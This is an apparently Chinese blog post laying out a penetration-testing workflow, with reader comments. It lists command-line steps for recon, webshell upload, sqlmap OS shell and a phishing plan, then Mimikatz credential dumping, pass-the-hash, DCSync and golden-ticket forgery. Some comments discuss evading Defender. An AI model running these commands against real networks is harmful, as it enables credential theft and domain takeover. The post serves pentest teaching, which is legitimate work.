权限提升实战:Windows 与 Linux 提权技巧

爪 爪
爪 爪
爪 爪
编辑
59
文章
0
粉丝
渗透测试341,408字数 473阅读1分34秒阅读模式
AI智能摘要
AI 生成的文章内容摘要

一、渗透测试流程概览

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写
权限提升实战:Windows 与 Linux 提权技巧

---

二、信息收集阶段

2.1 外网信息收集

# 子域名枚举
subfinder -d target.com -o subs.txt
# 端口扫描 nmap -sS -sV -p- target.com
# 目录扫描 dirsearch -u http://target.com -e php,html,js
# 指纹识别 whatweb http://target.com

2.2 社工库查询

- 邮箱泄露查询:haveibeenpwned.com
- 密码泄露查询:dehashed.com
- 企业邮箱格式:theHarvester

---

三、初始访问

3.1 Web 漏洞利用

# 文件上传漏洞
# 上传 webshell 到 /uploads/shell.php
# SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell
# RCE 漏洞 # Struts2、WebLogic、Fastjson 等

3.2 钓鱼攻击

1. 伪造登录页面
2. 发送钓鱼邮件
3. 获取员工凭证
4. VPN 登录内网

---

四、权限提升

4.1 Windows 提权

# 检查系统信息
systeminfo
whoami /priv
# 检查补丁 wmic qfe list
# 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula

4.2 linux 提权

# 检查内核版本
uname -a
# 检查 sudo 权限 sudo -l
# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null
# 检查 cron 任务 cat /etc/crontab

---

五、横向移动

5.1 凭证窃取

# Mimikatz 抓取密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
# 导出 hash mimikatz # lsadump::sam

5.2 传递攻击

# PtH(传递 hash)
mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH
# PtT(传递票据) mimikatz # kerberos::ptt admin.ccache

---

六、域控拿下

6.1 域信息收集

# 查看域信息
net domain
nltest /domain_trusts
# 查看域控 nltest /dclist:target.com
# 查看域用户 net user /domain

6.2 黄金票据

# 获取 krbtgt hash
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt
# 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx

---

七、报告编写

7.1 报告结构

1. 执行摘要
2. 漏洞列表(按风险等级)
3. 详细利用过程
4. 修复建议
5. 附录(工具、命令)

---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-04-21

 
爪 爪
  • 本文由 爪 爪 发表于2026年4月21日 15:38:22
  • crontab
  • it2021
  • it2021.com
  • nmap
  • shell
  • test
  • Web 漏洞利用
  • 信息收集
  • 子域名枚举
  • 渗透测试
  • 漏洞利用
  • 漏洞扫描
评论  34  访客  34
    • 发呆的榴莲
      发呆的榴莲 1

      mimikatz那段代码复制粘贴会报错吧

      • 皮城女警
        皮城女警 1

        这个subfinder要装吗还是自带的?

          • 青草涟漪
            青草涟漪 0

            @ 皮城女警 subfinder 肯定得自己装啊,系统哪来的这玩意儿?

          • 赛博神谕
            赛博神谕 0

            之前搞域渗透的时候黄金票据搞了半天,sid老是弄错

              • 西安城墙
                西安城墙 1

                @ 赛博神谕 sid 确实容易搞错,之前我也踩坑了,得仔细核对域 SID。

              • 厉鬼踪迹
                厉鬼踪迹 1

                干货确实可以👍

                • 夫诸水
                  夫诸水 1

                  看不懂但觉得很厉害😂

                    • 乒乓乓
                      乒乓乓 1

                      @ 夫诸水 哈哈,同感,全是黑话,看个热闹就行😂

                    • 火山Volcano
                      火山Volcano 0

                      补充下,linux提权还可以看看env路径

                      • 死亡预言者
                        死亡预言者 1

                        想问下现在win11还能用mimikatz抓密码吗?感觉 defender 查得挺严的

                          • 阳光生活家
                            阳光生活家 1

                            @ 死亡预言者 win11上mimikatz得先绕defender,不然一运行就崩。

                          • 醉看夕阳
                            醉看夕阳 1

                            横向移动那里写得有点太简略了

                            • 蹦极的方便面
                              蹦极的方便面 1

                              先存着

                              • 寒月仙子
                                寒月仙子 1

                                从信息收集到域控这流程挺清晰的,就是实战的时候经常卡在提权那步,各种补丁打满了

                                • 熬夜冠军007
                                  熬夜冠军007 1

                                  win11 那 defender 太严了,得先关实时防护或者搞免杀才行。

                                  • 月照伊
                                    月照伊 1

                                    env 路径那个点很关键,经常漏掉这块直接提权失败。

                                    • 湘妃竹泪
                                      湘妃竹泪 1

                                      Mimikatz 那段代码复制过去大概率报错,得改下参数格式。

                                      • 曙光
                                        曙光 1

                                        提权那块确实最头疼,补丁一多根本没法动,卡死在那儿。

                                          • 抖抖小羊
                                            抖抖小羊 1

                                            @ 曙光 黄金票据那步sid错了重来十次都不够折腾。

                                          • 胖乎乎的风
                                            胖乎乎的风 0

                                            横向移动写得太简略了,PtH 和 PtT 区别都没讲清楚吧?

                                            • 橡皮鸭子
                                              橡皮鸭子 1

                                              黄金票据生成那步要是 sid 不对,后面全白搭,太坑了。

                                              • TheLaughingLlama
                                                TheLaughingLlama 1

                                                流程看着挺顺,真打起来各种报错,心态崩了 hhh

                                                • 夜未央人独醒
                                                  夜未央人独醒 0

                                                  提权最怕遇到打满补丁的服务器,直接干瞪眼。

                                                  • 星见
                                                    星见 1

                                                    env路径提权试过一次成功了,运气好没被发现。

                                                    • 空山新雨
                                                      空山新雨 0

                                                      subfinder要自己装go环境,不是开箱即用。

                                                      • 幽光守护
                                                        幽光守护 1

                                                        看不懂但感觉这流程实战里分分钟翻车😂

                                                        • 灵息
                                                          灵息 0

                                                          linux提权还漏了个计划任务,经常能捡漏。

                                                          • StripesTheScribe
                                                            StripesTheScribe 0

                                                            mimikatz参数空格不对会报错,复制完还得手动改。

                                                            • 玫瑰柠檬水
                                                              玫瑰柠檬水 0

                                                              那个啥,域渗透时时间同步问题有人踩过吗?

                                                              • 疾驰的猎豹
                                                                疾驰的猎豹 1

                                                                流程是这么个流程,真打的时候全是意外。

                                                                • TwilightComet
                                                                  TwilightComet 1

                                                                  defender关实时防护风险太大,有没有更稳的免杀方法?

                                                                  • 旅梦成真
                                                                    旅梦成真 1

                                                                    提权时最怕遇到补丁打满的机器,直接卡住

                                                                    • 回声
                                                                      回声 1

                                                                      报告模板挺实用。

                                                                        • 悠闲的云
                                                                          悠闲的云 1

                                                                          @ 回声 这个模板不错,我也收藏了

                                                                      匿名

                                                                      发表评论

                                                                      匿名网友

                                                                      拖动滑块以完成验证